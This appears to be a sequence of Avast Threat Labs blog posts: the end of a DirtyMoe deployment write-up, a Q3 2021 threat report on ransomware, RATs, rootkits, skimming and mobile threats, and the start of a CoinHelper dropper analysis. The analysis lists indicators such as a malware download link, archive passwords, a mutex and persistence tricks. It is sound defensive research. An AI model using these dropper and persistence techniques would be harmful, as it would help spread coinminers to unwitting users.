Usually, the MSI installer caches installation files in C:\Windows\Installer for future use, such as updating, reinstalling, etc. However, DirtyMoe does not keep the .msi backup file. The installer just creates a hash file about the malware installation. The filename has the form SourceHash{<Product Code>}. The file contains the name of the MSI source package. The most prevalent GUID is equal to: {80395032-1630-4C4B-A997-0A7CCB72C75B}

The MSI Installer Rollback Script cannot remove the malware since deployed files are moved by the SMSS and are out of the MSI Installer scope.

The whole deployment workflow is illustrated in Figure 2.

Figure 2. DirtyMoe deployment workflow

5. Conclusion

We have introduced the deployment process of the DirtyMoe malware via the MSI Installer that presents an easy way of supporting multiple configurations for various Windows versions. The MSI installer prepares all necessary files and configuration for successful deployment of the malware and also cleans up backup and cache files. However, there are a few symptoms that can reveal the DirtyMoe installations.

After the system reboot, Session Manager overwrites the files representing one of the system services by the malicious DLL file. The system then runs an appropriate service and thereby loads the malicious code, including the default DirtyMoe’s object, as the legitimate service.

All these steps deploy and run DirtyMoe on the victim’s machine. In point of the cyber kill chain, detailed information about DirtyMoe service and further installation actions will be introduced in the future article.


[1] Description of the Windows File Protection feature
[2] Purple Fox EK
[3] Security Malware Windows Defender
[4] Enable or Disable Windows File Protection
[5] Split Threshold for svchost.exe in Windows 10
[6] EternalBlue
[7] MoveFileExA function (winbase.h)
[8] Pending FileRename Operations

The post DirtyMoe: Deployment appeared first on Avast Threat Labs.

Avast Q3’21 Threat Report

16 November 2021 at 12:58

Latest Avast Q3’21 Threat Report reveals elevated risk for ransomware and RAT attacks, rootkits and exploit kits return.


The threat landscape is a fascinating environment that is constantly changing and evolving. What was an unshakeable truth for a long time is no longer valid the next day; the most prevalent threats suddenly disappear, but are usually quickly replaced by at least two new ones; or that the bad guys standing behind these threats always come with new techniques when trying to get their profit.

Together with my colleagues, we came to the conclusion that it would be selfish to keep our insight into this landscape just for ourselves so we decided to start with publishing periodic Avast threat reports. Here, we would like to share with you details about emerging threats, stories behind malware strains and their spreading, and of course stats from our 435M+ endpoints telemetry.

So let us start with the Q3 report, and I must say it was a juicy quarter. To give you a sneak peak of the report: My colleagues published details about an ongoing APT campaign targeting the Mongolian certification authority MonPass. Another novel research was the discovery of the Crackonosh crypto stealer that earned more than $2 million USD to its operators. We were also intently monitoring which botnet will replace the previous kingpin Emotet in Q3. Furthermore, there was a rampant spreading of banking trojans on mobile (especially FluBot) and rootkits on Windows almost doubled their activity in September compared to the previous period. And for me, it started on July 2 at night with the Sodinokibi/REvil ransomware supply chain attack on the Kaseya MSP, it abused Microsoft Defender, there was involvement of world leaders, and precise timing (happening during my threat labs duty – respect to all infosec fellows that were dealing with that on this Independence weekend). As I said – it’s a fascinating environment…

Jakub Křoustek, Malware Research Director


This report is structured as two main sections – Desktop, informing about our intel from Windows, Linux, and MacOS, and Mobile, where we inform about Android and iOS threats.

Furthermore, we use the term risk ratio in this report for informing about the severity of particular threats, which is calculated as a monthly average of “Number of attacked users / Number of active users in a given country”. Unless stated otherwise, the risk is available just for countries with more than 10,000 active users per month.


Advanced Persistent Threats (APTs)

In Q3 of 2021, we saw APT activity on several fronts: continued attacks against Certificate Authorities (CAs), the Gamaredon group targeting military and government targets, and campaigns in Southeast Asia.

Certificate Authorities (CAs) are always of increased interest to APT groups for multiple reasons. By their very nature CAs have a high level of trust, they often provide services to the government organisations or being a part of one themselves, making them a perfect target for supply chain attacks. A well-known example was the targeting of the Vietnam Government Certification Authority in 2020. In Q3 Avast also wrote about activity targeting the Mongolian CA MonPass.

At the very beginning of Q3, Avast researchers discovered and published a story about an installer downloaded from the official website of Monpass, a major certification authority (CA) in Mongolia in East Asia that was backdoored with Cobalt Strike binaries. 

A public web server hosted by Monpass was breached potentially eight separate times: we found eight different webshells and backdoors on this server. The MonPass client available for download from 8 February 2021 until 3 March 20 2021 was backdoored. Adversaries used steganography to decrypt and implant Cobalt Strike beacons.

Additionally during the last few months we’ve seen an increased activity of the Gamaredon group primarily in Ukraine. The main targets of the group remain military and government institutions. The group keeps utilizing old techniques it’s been using for years in addition to a few new tools in their arsenal. Malware associated with Gamaredon was among the most prevalent between APT groups we tracked in this quarter.

Groups operating in Southeast and East Asia were active during this period as well. We’ve seen multiple campaigns in Myanmar, Philippines, Hong Kong and Taiwan. The majority of the actors in the region can be identified as Chinese-speaking groups. Technique of choice among these groups remains sideloading. We’ve seen samples with main functionality to search for potential candidates for sideloading on a victim’s machine, so they are not going to abandon this technique anytime soon.

Luigino Camastra, Malware Researcher
Igor Morgenstern, Malware Researcher
Michal Salát, Threat Intelligence Director


Old botnets still haven’t said their last word. After Emotet’s takedown at the start of 2021, Trickbot has been aspiring to become its successor. Moreover, despite numerous takedown attempts, Trickbot is still thriving. Qakbot came up with a rare change in its internal payload which brought restructured resources. As for Ursnif (aka Gozi), the activity in Q3 kept its usual pace – with new webinjects and new builds being continuously released. However, Ursnif’s targets remain largely the same – European, and especially Italian, banks and other financial organisations. Surprisingly, Phorpiex seemed to maintain its presence, even though its source code has been reported to be on sale in August. This is especially true for Afghanistan, Turkmenistan, and Yemen where Phorpiex is especially prolific, significantly contributing to their above-average risk ratio.

Below is a heatmap showing the distribution of botnets that we observed in Q3 2021.

The IoT and Linux bot landscape is a wild west, as usual. We are still seeing many Gafgyt and Mirai samples trying to exploit their way onto various devices. The trend of these families borrowing the code from each other still continues, so while we sometimes see samples being worthy of being called a new strain, many samples continue to blur the line between Gafgyt and Mirai strains. We expect this trend to continue – both strains have their source code available, and the demand for DDoS does not lessen. Due to their popularity, the source code is also often used by technically less proficient adversaries, partially explaining the latter trend of code reuse.

Q3’s surprise has been the MyKings botnet which has had quite a profitable campaign. Their cryptoswapper campaign has managed to amass approximately 25 million dollars in Bitcoin, Ethereum and Dogecoin.

Changes in malware distribution methods

In Q3 2021, we saw a shift in bot and RAT distribution. Threat actors are finding new ways of abusing third party infrastructure. While we have previously seen various cloud storages (e.g. OneDrive) or Pastebin, we are also seeing more creative means such as Google’s for C&C URLs or Discord’s CDN as a distribution channel. This makes it easier for them to avoid reputation services meant to combat malware distribution, though at the cost that their channels may get disrupted by the service provider. Since we’ve already seen communication platforms such as Discord or Telegram being also abused for exfiltration or as C&C, we can expect this trend to spread to other similar automation-friendly services.

Adolf Středa, Malware Researcher 

Infrastructure as a service for malware

It seems that infrastructure as a service for malware and botnets is on the rise by using commodity routers and IoT devices. Threat actors realized that it’s far easier to misuse these devices as a proxy to hide malicious activity than crafting specific malware for such a variety of architectures and devices. It also seems that we are witnessing botnets of enslaved devices being sold as a service to various threat actors. 

In Q2 and Q3, we’ve seen a new campaign dubbed Mēris. This campaign attacked Mikrotik routers, already known to be problematic since 2018, for DDoS attacks against Yandex servers. Further analysis showed that this attack had been just one of the campaigns run through the MikroTik botnet as a service providing anonymizing proxies. It turned out that the botnet consisted of approximately 200K of enslaved devices with an opened SOCKS proxy being ready for hire on darknet forums. It’s believed that this actor has been controlling this botnet since 2018. Moreover, there are ties to Glupteba and coin mining campaigns in 2018. Although most of the botnet has been taken down, the original culprit and vulnerabilities in the Mikrotik routers seem to be still open. The attack vector is notoriously well-known and is common for most of the IoT and router devices: unpatched firmware and default credentials. We’ll inevitably see more of this trend in the future.

Below is a heatmap showing the prevalence of unpatched Mikrotik routers in Q3 2021.

Martin Hron, Malware Researcher


Coinminers are malware that hijacks resources of infected PCs to mine cryptocurrency and send its profit directly to the attacker while the electricity bill is left for the victim. The number of users attacked by coinminers has actually stayed steady or even lowered some in Q3 2021 compared to the beginning of the year as shown below.

It is possible that this stagnant or even lowering threat trend is due to the prices of cryptocurrencies. The prices of Bitcoin, Etherum and Monero were on the low end from the end of May until the end of July. Q3 saw a significant sell-off of Bitcoin especially in response to increased signals that the Chinese government would move to regulate cryptocurrency. As a consequence the number of coinmining attacks we saw in Q3 were low and we did not observe any new threats. 

The most prevalent mining software used in coinminers was still XMRig (28%). The geological distribution of coinminers is almost the same as in Q2 as shown below.

It is hard to estimate how much the attackers obtained by mining, because they usually use untraceable cryptocurrency such as Monero. But we have some pieces of the puzzle. We were able to track some payments for Crackonosh malware. Our analysis shows that it was able to mine over $2 million USD since 2018. Crackonosh represents just about 2% of all coinminer attacks we see in our userbase. Crackonosh is packed with cracked copies of popular games, it uses Windows Safe Mode to uninstall antimalware software (note that Avast users are protected against this tactic) and then it installs XMRig to mine Monero.

Daniel Beneš, Malware Researcher


Q3 was a thrilling quarter from the ransomware perspective. One can almost get used to newspaper headlines about ransomware breaches and attacks on large companies on a daily basis (e.g. Olympus and Newcoop attacks by BlackMatter ransomware), but at the same time, we witnessed a huge supply chain attack not seen for a while, involvement of state leaders in addressing it and much more.

Overall, Q3 ransomware attacks were 5% higher than in Q2 and even 22% higher than in Q1 2021.

At the very beginning of Q3 (July 2), we spotted an attack of the Sodinokibi/REvil ransomware delivered via a supply chain attack on Kaseya MSP. The impact was massive – more than 1,500 businesses were targeted. Also other parts of the attack were fascinating. This particular cybercriminal group used the DLL sideloading vulnerability of Microsoft Defender for delivery of the target payload, which could have confused some security solutions. We’ve seen abuse of this particular Defender application already in May 2020. Overall, we’ve noticed and blocked this attack on more than 2.4k endpoints based on our telemetry. The story of this attack continued over Q3 with involvement of presidents Joe Biden and Vladimir Putin resulting in ransomware operators releasing the decryption key, which helped with unlocking files of affected victims. It gave us one more clue for the attribution of the origin of this (R)evil. After the release of the decryption key, Sodinokibi went silent for almost two months – their infrastructure went down, no new variants were seen in the wild, etc. However, it was us who detected (and blocked) its latest variant on September 9. This story evolved in November, but let’s keep it for the Q4 report.

However, Sodinokibi was only one piece of the ransomware threat landscape puzzle in Q3. The top spreading strains overall were:

  • STOP/Djvu – often spread via infected pirated software
  • WannaCry – the one and only, still spreading after four years via the EternalBlue exploit
  • CrySiS – also spreading for a long time via hacked RDP
  • Sodinokibi/REvil
  • Various strains derived from open-source ransomware (HiddenTear, Go-ransomware, etc.)

Furthermore, there were multiple active strains focused on targeted attacks on businesses, such as BlackMatter (previously DarkSide) and various ransomware strains from the Evil Corp group (e.g. Grief) and Conti.

The heat map below shows the risk ratio of users protected against ransomware Q3 2021.

As shown below the distribution of ransomware attacks was very similar to previous quarters except for a 600% increase in Sweden that was primarily caused by the aforementioned Kaseya supply chain attack.

hits trendline

The number of protected users by ransomware attacks was highest in July, and it decreased slightly in August and September. 

Jakub Křoustek, Malware Research Director

Remote Access Trojans (RATs)

Unlike ransomware, RAT campaigns are not as prevalent in newspaper headlines because of their very secretive nature. Ransomware needs to let you know that it is present on the infected system but RATs try to stay stealthy and just silently spy on their victims. The less visible they are the better for the threat actors. 

In Q3, three new RAT variants were brought to our attention. Among these new RATs were FatalRAT with its anti-VM capabilities, VBA RAT which was exploiting the Internet Explorer vulnerability CVE-2021-26411, and finally a new version of Reverse RAT with build number 2.0 which added web camera photo taking, file stealing and anti-AV capabilities.

But these new Remote Access Trojans haven’t drastically changed representation of RAT type in the wild yet.

We saw an  elevated risk ratio for RATs in many countries all over the world. In particular, we had to protect more users in countries such as Russia, Singapore, Bulgaria or Turkey where RAT attacks were elevated this quarter. 

In the heat map below, we can see the risk ratio for RATs globally in Q3 2021. 

Distribution of RAT risk ratio worldwide

Out of all users attacked by RATs in Q3, 19% were attacked by njRAT (also known as Bladabindi). njRat has been spreading since 2012 and it owes its popularity to the fact that it was open sourced a long time ago and many different variants were built on top of its source written in VB.NET. After njRAT, the most prevalent RAT strains were: 

  • Remcos ‒ 11%
  • AsyncRat ‒ 10%
  • NanoCore ‒ 9%
  • Warzone ‒ 6%
  • QuasarRAT ‒ 5%
  • NetWire ‒ 5%
  • DarkComet ‒ 4%

What made these RATs so popular and what was the reason they spread the most? The answer is simple, all of them were either open-sourced or cracked and that helped their popularity especially among less sophisticated script-kiddie attackers and among users of many hacking forums where they were often shared. njRat, Remcos, AsyncRat, NanoCore and QuasarRat were open-sourced and the rest was cracked. From this list only Warzone had a working paid subscription model from its original developer. Attackers used these RATs especially for industry espionage, credentials theft, stalking and with many infected computers, even DDOS.

Samuel Sidor, Malware Researcher


A rootkit is malicious software designed to give unauthorized access with the highest system privileges. Rootkits commonly provide services to other malware in the user mode. It typically includes functionality such as concealing malware processes, files and registry entries. In general, the rootkits have total control over a system they operate in the kernel layer, including modifying critical kernel structures. Rootkits are still popular techniques to hide malicious activity despite a high risk of being detected because the rootkits work in the kernel mode, and each critical bug can lead to BSoD.

We have recorded a significant increase in rootkit activity at the end of Q3, illustrated in the chart below. While we can’t be sure what’s behind this increase, this is one of the most significant increases in activity in Q3 2021 and is worth watching. It also underscores that defenders should be aware that rootkits, which have been out of the spotlight in recent years, remain a threat and in fact are increasing once again.

hits trendline

The graph below demonstrates that China and adjacent administrative areas (Macao, Taiwan, Hong Kong) are the most risk counties from the point of view of protected users in Q3 of 2021.

In Q3, we have also become interested in analyzing the code-signing of a rootkit driver, which protects the malicious activity of a complex and modularized malicious backdoor utilizing sophisticated C&C communication, self-protection mechanisms, and a wide variety of modules performing various suspicious tasks, called DirtyMoe focusing on the Monero mining.

This research has led us to the issue of signing windows drivers with revoked certificates. There have been identified 3 revoked certificates that sign the DirtyMoe rootkit and also sign other rootkits. Most users have been attacked in Russia (40%), China (20%), and Ukraine (10%).

Martin Chlumecký, Malware Researcher

Information Stealers

In Q3, we’ve seen a steady increase in numbers of various information stealers as can be seen on the daily spreading chart below.

protected users trendline

The risk ratio of this threat is globally high and similar across the majority of countries worldwide with peaks in Africa and the Middle East.

One of such stealers is a clipboard stealer, distributed by a notorious botnet called MyKings, that focuses on swapping victim’s cryptocurrency wallet addresses present in their clipboard with an attacker’s address. When the victim copies data into their clipboard, the malware tries to find a specific pattern in the content of the clipboard (such as a web page link or a format of cryptocurrency wallet) and if it is found, the content is replaced with the attackers’ information. Using this simple technique, the victim thinks for instance they pasted their friend’s cryptowallet address while the attacker changed the address in the meantime to their own, effectively redirecting the money.

MyKings also changes two kinds of links when present in the victim’s clipboard – Steam trade offer links and Yandex Disk storage links. This way, the attacker changes the Steam trade offer from the victim to himself, thus giving the trade over to the attacker who pockets the money. Furthermore, when the user wants to share a file via Yandex Disk storage cloud service, the web link is changed with a malicious one – leading the victim to download further malware because there is no reason to suspect the link is malicious when received from a friend.

Our research has shown that, since 2019, the operators behind MyKings have amassed at least $24 million USD (and likely more) as of 2021-10-05 in the Bitcoin, Ethereum, and Dogecoin cryptowallets associated with MyKings. While we can’t attribute this amount solely to MyKings, it still represents a significant sum that can be tied to MyKings activity. In addition to the aforementioned amounts, the clipboard stealer also focuses on more than 20 different cryptocurrencies, further leveraging the popularity of the cryptocurrency world. In Q3, MyKings was most active in Russia, Pakistan, and India.

Furthermore, Blustealer is a new and emerging stealer first seen at the beginning of Q3 and spiked in activities around 10-11 September. Primarily distributed through phishing emails, Blustealer is capable of stealing credentials stored in web browsers and crypto wallet data, hijacking crypto wallet addresses in clipboard, as well as uploading document files. The current version of Blustealer uses SMTP (email) and Telegram (Bot API) for data exfiltration.

Jan Rubín, Malware Researcher
Jakub Kaloč, Malware Researcher
Anh Ho, Malware Researcher

Technical support scams

Tech support scam (or TSS in short) is a big business and the people behind it use a number of techniques to try and convince you that you need their help. Most of the techniques these websites use are aimed at making your browser and system seem broken.

This topic became very popular on Youtube and TikTok as it attracted the attention of “scambaiters” – a type of vigilante who disrupts, exposes or even scams the world’s scammers.

We’ve seen a growing trend of TSS attacks with its peak at the end of August as shown below..

hits trendline

Overall we can see the distribution of  TSS attacks globally in Q3 2021 below.

We’ve divided these fraudsters into groups according to geography and similar attack patterns. These groupings can include multiple fraud groups that use the same tool, or use similar browser locking methods. The following table represents the unique hits for each group.

The most prevalent group in Q3 2021, called GR2 by us, typically targets mostly European countries, such as Russia, France, Ukraine, or Spain. These countries also had a high TSS risk ratio overall together with Iceland, Uzbekistan, and Rwanda.

We can see how GR2 was the most active TSS group and had its peak in mid-July.

Alexej Savčin, Malware Analyst

Vulnerabilities and Exploits

Q3 has seen plenty of newly discovered vulnerabilities. Of particular interest was PrintNightmare, a vulnerability in the Windows Print Spooler, which allowed for both local privilege escalation (LPE) and remote code execution (RCE) exploits. A Proof of Concept (PoC) exploit for PrintNightmare got leaked early on, which resulted in us seeing a lot of exploitation attempts by various threat actors. PrintNightmare was even integrated into exploit kits such as PurpleFox, Magnitude, and Underminer

Another vulnerability worth mentioning is CVE-2021-40444. This vulnerability can either be used to create malicious Microsoft Office documents (which can execute malicious code even without the need to enable macros) or it can be exploited directly against Internet Explorer. We have seen both exploitation methods used in-the-wild, with a lot of activity detected shortly after the vulnerability became public in  September 2021. One of the first exploit attempts we detected was against an undisclosed military target, which proves yet again that advanced attackers waste no time weaponizing promising vulnerabilities once they become public.

We’ve also been tracking exploit kit activity throughout Q3. The most active exploit kit was PurpleFox, against which we protected over 6k users per day on average. Rig and Magnitude were also prevalent throughout the whole quarter. The Underminer exploit kit woke up after a long period of inactivity and started sporadically serving HiddenBee and Amadey. Even though it might seem that exploit kits are becoming a thing of the past, we’ve witnessed that some exploit kits (especially PurpleFox and Magnitude) are being very actively developed, regularly receiving new features and exploitation capabilities. We’ve even devoted a whole blog post to the recent updates in Magnitude. Since that blog post, Magnitude continued to innovate and most interestingly was even testing exploits against Chromium-based browsers. We’ll see if this is the beginning of a new trend or just a failed experiment.

PurpleFox EK hits trendline

Overall, Avast users from Singapore, Czechia, Myanmar, Hong Kong and Yemen had the highest risk ratio for exploits, as can be seen on the following map.

The risk ratio for exploits was growing in Q3 with its peak in September.

hits trendline

Michal Salát, Threat Intelligence Director
Jan Vojtěšek, Malware Researcher

Web skimming 

Ecommerce websites are much more popular than they used to be, people tend to shop online more and more often. This led to the growth of an attack called web skimming. 

Web skimming is a type of attack on ecommerce websites in which an attacker inserts malicious code into a legitimate website. The purpose of the malicious code is to steal payment details on the client side at the moment the customer fills in their details in the payment form. These payment details are usually sent to the attacker’s server. To make the data flow to a third-party resource less visible, fraudsters often register domains resembling the names of popular web services like google-analytics, mastercard, paypal and others.

The map below shows that users from Australia, the United States, Canada, Brazil and Argentina were most at risk in Q3. Of the smaller countries, we can see Guatemala and Slovenia at the top. The high risk ratio in Guatemala was caused by an infected eshop elduendemall[.]com

hits trendline

Top two malicious domains used by attackers were webadstracker[.]com and ganalitics[.]com. Webadstracker[.]com was blocked by Avast from 2021-03-04 and was active from then for the whole Q3. It indicates that unlike phishing sites, which are active usually for a couple of days, web skimming domains can be active much longer. Webadstracker[.]com is hosted on Flowspec, which is known as one of the bulletproof hosting providers. From all web skimming incidents we observed, 8.6% were on this domain. With this domain, we can link other domains on the same IP, which was also used for web skimming attacks in Q3:

  • webscriptcdn[.]com
  • cdncontainer[.]com
  • cdnforplugins[.]com
  • shoppersbaycdn[.]com
  • hottrackcdn[.]com
  • secure4d[.]net

We were able to link this IP ( with 75 infected eshops. Lfg[.]com[.]br was the top ecommerce website infected with webadstracker[.]com was in Q3.

Pavlína Kopecká, Malware Analyst


Open Firebase instances

Firebase is Google’s mobile and web app development platform. Developers can use Firebase to facilitate developing mobile and web apps, especially for the Android mobile platform. In our study we discovered that more than 10% of about 180,000 tested Firebase instances, used by Android apps, were open. The reason is a misconfiguration, made by application developers. Some of these DBs exposed sensitive data, including plaintext passwords, chat messages etc. These open instances pose a significant risk of users’ data leakage. Unfortunately, ordinary users can’t check if DB used by an application is misconfigured, moreover it can become open at any moment.

Vladimir Martyanov, Malware Researcher


Adware continues to be a dominant threat on Android. This category may take various forms – from traditional aggressive advertising on either legitimate or even fake applications to completely fake applications that, while installed with an original purpose of stopping adware, end up doing exactly the opposite and bombard the user with out-of-context ads (for example FakeAdBlocker).

The degree to which the aggressive advertisement is shown to the user – either in app or out-of-context very negatively affects the user’s experience, not to mention that in the case of out-of-context ads the user has a very difficult time of actually locating the source of such spam.

A special category in this regard is the so called Fleeceware, which we have been observing both on iOS and Android already for quite some time, this type of threat is still present in Q3 in the official marketplaces and users should be aware of such techniques so that they can actively avoid falling for it.

Ondřej David, Malware Analysis Team Lead

Bankers – FluBot

We have seen a steady increase in the number of mobile banking threats for a while now, but none more than in Q3 2021. This can be best evidenced on a strain called FluBot – while this strain has been active since Q1/Q2, we’ve seen it make a couple of rounds since then. By Q3 it became an established threat in the Android banking threat landscape. 

Its advanced and highly sophisticated spreading mechanisms – using SMS messages typically posing as delivery services to lure the victims into downloading a “tracking app” for a parcel they recently missed or should be expecting – as well as the relentless campaigns account for a successful strain in the field. But even these phishing SMS messages (aka. smishing) have evolved and especially in Q3 we have seen novel scenarios in spreading this malware. One example is posing as voicemail recorders. Another is fake claims of leaked personal photos. The most extreme of these variants would then even lure the victim to a fake page that would claim  the victim has already been infected by FluBot when they probably weren’t yet and trick them into installing a “cure” for the “infection”. This “cure” would in fact be the FluBot malware itself. 

We have seen a steady expansion of the scope where FluBot operated throughout Q2 and mainly Q3, where initially it was targeting Europe – Spain, Italy, Germany, later spreading throughout the rest of Europe, but it didn’t end there. In Q3 we’ve seen advisories being posted in many other countries, including countries like Australia and New Zealand. This threat affects only Android devices – iOS users may still occasionally receive the phishing SMS messages, but the malware would not be able to infect the device.

The heat map below shows the spread of Flubot in Q3 2021 and the graph shows the increase in Flubot infections in that same time period.

hits trendline

Ondřej David, Malware Analysis Team Lead


Perhaps the most discussed mobile threat in Q3 was the infamous Pegasus spyware. Developed by Israeli’s NSO Group this threat targeted primarily iOS device users with known Android variants as well. Due to the usage of zero-click vulnerabilities in the iMessage application the attackers were able to infect the device without any user interaction necessary. This makes it a particularly tricky and sophisticated threat to deal with. Fortunately for the majority of the users this type of attack is unlikely to be used on a mass scale, but rather in a highly targeted manner against high profile or high value targets

Acting as a full blown spyware suite, Pegasus is capable of tracking location, calls, messages and many other personal data. Pegasus as a strain is not exactly new, its roots go deep into history as far back as at least 2016. The threat as well as its distribution methods have changed significantly since the early days however. For a successful stealthy distribution of this threat the malicious actors needed to keep finding vulnerabilities in the ever updating OS or default apps that could be used as a way to infect the device – ranging from remote jailbreaks to the latest versions utilizing zero-click exploits.

Best protection against this type of threat is to keep your mobile device’s operating system updated to the latest version and have all the latest security updates installed.

Ondřej David, Malware Analysis Team Lead

Acknowledgements / Credits

Malware researchers
  • Adolf Středa
  • Alexej Savčin
  • Anh Ho
  • Daniel Beneš
  • David Jursa
  • Igor Morgenstern
  • Jakub Kaloč
  • Jakub Křoustek
  • Jan Rubín
  • Jan Vojtěšek
  • Luigino Camastra
  • Martin Chlumecký
  • Martin Hron
  • Michal Salát
  • Ondřej David
  • Pavlína Kopecká
  • Samuel Sidor
  • Vladimir Martyanov
Data analysts
  • Lukáš Zobal
  • Pavol Plaskoň
  • Petr Zemek
  • Christopher Budd
  • Marina Ziegler

The post Avast Q3’21 Threat Report appeared first on Avast Threat Labs.

Toss a Coin to your Helper (Part 2 of 2)

1 December 2021 at 14:26

In the first posting of this series, we looked at a clipboard stealer belonging to the MyKings botnet. In this second part of the blog series, we will discuss in detail a very prevalent malware family of AutoIt droppers, that we call CoinHelper, used in a massive coinmining campaign. Since the beginning of 2021, Avast has protected more than 125,000 users worldwide from this threat. CoinHelper is mostly bundled with cracked software installers such as WinRAR and game cheats.

Regarding game cheats, we’ve seen this bundling with some of the most popular and famous games out there including (but not limited to): Extrim and Anxious (Counter-Strike Global Offensive cheats), Cyberpunk 2077 Trainer (Cyberpunk 2077 cheat), PUBG and CoD cheats, and Minecraft. We’ve also found this threat inside a Windows 11 ISO image from unofficial sources (as we indicated on Twitter). We have even seen this threat bundled with clean software such as Logitech drivers for webcams. All in all, we have seen CoinHelper bundled with more than 2,700 different software so far, including games, game cheats, security software, utilities, clean and malware applications alike.

Our research brought us to this because we have seen a spread of these droppers via MyKings’ clipboard stealer payload as well, as described in our previous part of the blog post series. Nevertheless we can’t attribute CoinHelper to MyKings botnet, on the contrary based on the number of different sources of infection, we believe that CoinHelper used MyKings’ clipboard stealer as an additional system of malware delivery.

We have found some mentions of these AutoIt droppers in other blog posts from last year. One of the most notable instances was detailed by Trend Micro, describing a sample of the AutoIt dropper bundled with Zoom communicator (downloaded from an unofficial source) which happened in the early days of the COVID-19 pandemic when millions of new users were flocking to Zoom. Another instance is in a post from Cybereason mentioning a new dropper for XMRig miners.

In this blog post, we analyze the latest version of CoinHelper in detail, discuss the malware campaign, describe all its components as well as research into what applications are most often bundled with the malware and show how the malware spreads. We also outline some of the data harvesting that it performs on infected systems to map the infected victims.

Campaign overview

Since the beginning of 2020, we have seen more than 220,000 attempts to infect our users with CoinHelper, most of them being in Russia (83,000). The second most targeted country is Ukraine with more than 42,000 attacked users.

Map illustrating the targeted countries since the beginning of 2020

Monetary gain

One of the primary goals of CoinHelper is to drop a crypto miner on the infected machine and use the resources (electricity and computing power) of the victim’s computer to generate money for the attackers through mining.

Even though we observed that multiple crypto currencies, including Ethereum or Bitcoin, were mined, there was one particular that stood out – Monero. From the total of 377 crypto wallet addresses we extracted from the malware, 311 of them mined Monero through crypto mining pools. The reasons for criminals to choose Monero are quite obvious. Firstly, this cryptocurrency was created and designed to be private and anonymous. This means that tracing the transactions, owners of the accounts or even amounts of money that were stolen and/or mined can be quite difficult. Secondly, this cryptocurrency has a good value at this time – you can exchange 1 XMR  for ~$240 USD (as of 2021-11-29) 

Even though Monero is designed to be anonymous, thanks to the wrong usage of addresses and the mechanics of how mining pools work, we were able to look more into the Monero mining operation of the malware authors and find out more about how much money they were able to gain.

To ensure more regular income, the miners were configured to use Monero mining pools. Mining pools are often used by miners to create one big and powerful node of computing power that works together to find a suitable hash and collect a reward for it. Because the search for the suitable hash is random, the more guesses you make, the bigger your chance to be successful. In the end, when the pool receives a reward, the money is split between the members of the pool depending on their share of work. Usage of the pools is very convenient for malware authors, specifically because pools work with a limited time. This is helpful for malware authors because it gives them a greater chance to successfully mine cryptocurrency in the limited time they have before their miners are discovered and eradicated.

In total we registered 311 Monero addresses used in the configuration of miners dropped by the AutoIts. These addresses were used in more than 15 different Monero mining pools whereas our data and research confirm that the mining campaign is even bigger and a lot of the addresses were used across multiple pools. After diving more into the data that the pools offer, we are able to confirm that as of 2021-11-29 the authors gained more than 1,216 XMR solely by crypto mining, which translates into over $290,000 USD. 

Apart from the Monero addresses, we also registered 54 Bitcoin addresses and 5 Ethereum addresses. After looking at these addresses we can conclude that these addresses received following amounts of money:

Cryptocurrency Earnings in USD Earnings in cryptocurrency Number of wallets
Monero $292,006.08 1,216.692 [XMR] 311
Bitcoin $46,245.37 0.796 [BTC] 54
Ethereum $1,443.41 0.327 [ETH] 5
Table with monetary gain (data refreshed 2021-11-29)

This makes total monetary gain of this malware 339,694.86 USD as of 2021-11-29. The amounts from the table above are total incomes of the Bitcoin and Ethereum wallets, so we can’t exclude the possibility that some part of money comes from other activities than mining, but we assume that even those activities would be malicious. As can be seen from the data we collected, the major focus of this campaign is on mining Monero, where attackers used ~5 times more wallet addresses and gained ~6 times more money.

Technical analysis

Dropping the payload

Let’s continue straight away where we left off in the previous part. As we learned, the clipboard stealer could swap copy+pasted wallet addresses in the victim’s clipboard, as well as swap other links and information depending on the malware’s configuration. One of these links was https://yadi[.]sk/d/cQrSKI0591KwOg.

After downloading and unpacking the archive (with a password gh2018), a new sample Launcher.exe is dropped (c1a4565052f27a8191676afc9db9bfb79881d0a5111f75f68b35c4da5be1f385). Note that this approach is very specific for the MyKings clipboard stealer and requires user’s interaction. In other, and most common, cases the user obtains a whole bundled installer from the internet, unintentionally executing the AutoIt during the installation of the expected software.

This sample is the first stage of a compiled AutoIt script, a dropper that we call CoinHelper, which provides all necessary persistence, injections, checking for security software along the way, and of course downloading additional malware onto the infected machine.

Although this sample contains almost all of the latest functionality of these AutoIt droppers, it is not the latest version and some of their features are missing. For that reason, we decided to take a newer (but very similar) version of the dropper with a SHA 83a64c598d9a10f3a19eabed41e58f0be407ecbd19bb4c560796a10ec5fccdbf instead and describe thoroughly all of the functionalities in one place.

Overview of the infection chain

Exploring the first stage

Let’s dive into the newer sample. This one is usually downloaded with a name start.exe on users’ machines and holds a Google Chrome icon. Upon a closer look, it is apparent that this is a compiled AutoIt binary.

After extracting the AutoIt script from the sample we can see additional components:

  • asacpiex.dll
  • CL_Debug_Log.txt
  • glue\ChromeSetup.exe

CL_Debug_Log.txt is a clean standalone executable of 7zip and asacpiex.dll is a damaged (modified) 7zip archive carrying the second stage of the malware. Soon, we will fix this archive and look inside as well, but first, let’s focus on the extracted AutoIt script. The last binary from the list above, placed in the glue folder, is one of the many possibilities of the bundled apps inside CoinHelper. In this case, we witness a clean setup installer of the Chrome browser. If you are interested in seeing what other applications are usually bundled with CoinHelper, see Bundled apps overview for details.

Rude welcome

The AutoIt script is actually very readable. Well, perhaps even too much, looking at the vulgarity in the beginning. Note that Region / EndRegion is SciTE text editor’s feature to mark code regions. In this case, however, the script starts with the EndRegion clausule and some well known AutoIt decompilers, such as Exe2Aut (v0.10), struggle very much with this and are unable to decompile the script, effectively displaying just the rude welcome. Note that myAut2Exe (v2.12) for example has no issues with the decompilation.

We can also see here the beginning of the malware’s configuration, first checking for the existence of a mutex QPRZ3bWvXh (function called _singleton), followed by scheduled task configuration. As shown in the code above, the SystemCheck scheduled task presents itself as a Helper.exe application from Microsoft. However, Microsoft doesn’t provide any tool with such a name. The scheduled task is used for executing the malware, persistently.

The modification of the asacpiex.dll archive was done by nulling out the first five bytes of the file which can be easily restored to reflect the usual 7zip archive header: 37 7A BC AF 27. The script is replacing even more bytes, but that is not necessary.

Before we dive into the contents extracted from the archive (a keen eye already spotted that the password is JDQJndnqwdnqw2139dn21n3b312idDQDB), let’s focus on the rest of this script. We will continue with the unpacking of asacpiex.dll in the Exploring the second stage section.

In the code above, we also see that ChromeSetup.exe is placed into the glue folder. This folder (sometimes called differently, e.g. new) contains the original application with which the malware was bundled together. In our analysis we are showing here, this is a clean installer of the Chrome browser that is also executed at this stage to preserve the expected behavior of the whole bundle.

